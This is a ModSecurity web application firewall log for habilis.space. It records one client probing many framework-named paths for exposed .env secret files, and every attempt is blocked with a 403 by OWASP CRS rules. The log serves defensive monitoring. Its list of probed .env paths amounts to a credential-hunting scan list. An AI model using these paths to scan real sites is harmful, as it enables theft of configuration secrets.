[Mon May 11 17:33:47.034269 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/admin-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMJwAAAI8"]
[Mon May 11 17:33:47.034622 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMJwAAAI8"]
[Mon May 11 17:33:47.146303 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/control-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMKAAAAI8"]
[Mon May 11 17:33:47.146622 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/control-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMKAAAAI8"]
[Mon May 11 17:33:47.146976 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMKAAAAI8"]
[Mon May 11 17:33:47.259911 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/user-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMKQAAAI8"]
[Mon May 11 17:33:47.260245 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/user-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMKQAAAI8"]
[Mon May 11 17:33:47.260608 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMKQAAAI8"]
[Mon May 11 17:33:47.373424 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/node/.env"] [unique_id "agH22_y_GXSWIKeli0sMKgAAAI8"]
[Mon May 11 17:33:47.373641 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/node/.env"] [unique_id "agH22_y_GXSWIKeli0sMKgAAAI8"]
[Mon May 11 17:33:47.373859 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMKgAAAI8"]
[Mon May 11 17:33:47.487843 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/express/.env"] [unique_id "agH22_y_GXSWIKeli0sMKwAAAI8"]
[Mon May 11 17:33:47.488068 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/express/.env"] [unique_id "agH22_y_GXSWIKeli0sMKwAAAI8"]
[Mon May 11 17:33:47.488306 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMKwAAAI8"]
[Mon May 11 17:33:47.599997 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/next/.env"] [unique_id "agH22_y_GXSWIKeli0sMLQAAAI8"]
[Mon May 11 17:33:47.600230 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/next/.env"] [unique_id "agH22_y_GXSWIKeli0sMLQAAAI8"]
[Mon May 11 17:33:47.600458 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMLQAAAI8"]
[Mon May 11 17:33:47.953863 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/nuxt/.env"] [unique_id "agH22_y_GXSWIKeli0sMLgAAAI8"]
[Mon May 11 17:33:47.954089 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/nuxt/.env"] [unique_id "agH22_y_GXSWIKeli0sMLgAAAI8"]
[Mon May 11 17:33:47.984057 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22_y_GXSWIKeli0sMLgAAAI8"]
[Mon May 11 17:33:48.113479 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/nest/.env"] [unique_id "agH23Py_GXSWIKeli0sMLwAAAI8"]
[Mon May 11 17:33:48.113700 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/nest/.env"] [unique_id "agH23Py_GXSWIKeli0sMLwAAAI8"]
[Mon May 11 17:33:48.113928 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMLwAAAI8"]
[Mon May 11 17:33:48.227906 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/react/.env"] [unique_id "agH23Py_GXSWIKeli0sMMAAAAI8"]
[Mon May 11 17:33:48.228116 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/react/.env"] [unique_id "agH23Py_GXSWIKeli0sMMAAAAI8"]
[Mon May 11 17:33:48.228349 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMMAAAAI8"]
[Mon May 11 17:33:48.345443 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/vue/.env"] [unique_id "agH23Py_GXSWIKeli0sMMQAAAI8"]
[Mon May 11 17:33:48.345676 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/vue/.env"] [unique_id "agH23Py_GXSWIKeli0sMMQAAAI8"]
[Mon May 11 17:33:48.345904 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMMQAAAI8"]
[Mon May 11 17:33:48.458135 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/angular/.env"] [unique_id "agH23Py_GXSWIKeli0sMMgAAAI8"]
[Mon May 11 17:33:48.458409 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/angular/.env"] [unique_id "agH23Py_GXSWIKeli0sMMgAAAI8"]
[Mon May 11 17:33:48.458702 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMMgAAAI8"]
[Mon May 11 17:33:48.571952 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/svelte/.env"] [unique_id "agH23Py_GXSWIKeli0sMMwAAAI8"]
[Mon May 11 17:33:48.572186 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/svelte/.env"] [unique_id "agH23Py_GXSWIKeli0sMMwAAAI8"]
[Mon May 11 17:33:48.572426 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMMwAAAI8"]
[Mon May 11 17:33:48.689349 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/vite/.env"] [unique_id "agH23Py_GXSWIKeli0sMNAAAAI8"]
[Mon May 11 17:33:48.689577 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/vite/.env"] [unique_id "agH23Py_GXSWIKeli0sMNAAAAI8"]
[Mon May 11 17:33:48.689809 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMNAAAAI8"]
[Mon May 11 17:33:48.800899 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/backup/.env"] [unique_id "agH23Py_GXSWIKeli0sMNQAAAI8"]
[Mon May 11 17:33:48.801141 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/backup/.env"] [unique_id "agH23Py_GXSWIKeli0sMNQAAAI8"]
[Mon May 11 17:33:48.801380 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMNQAAAI8"]
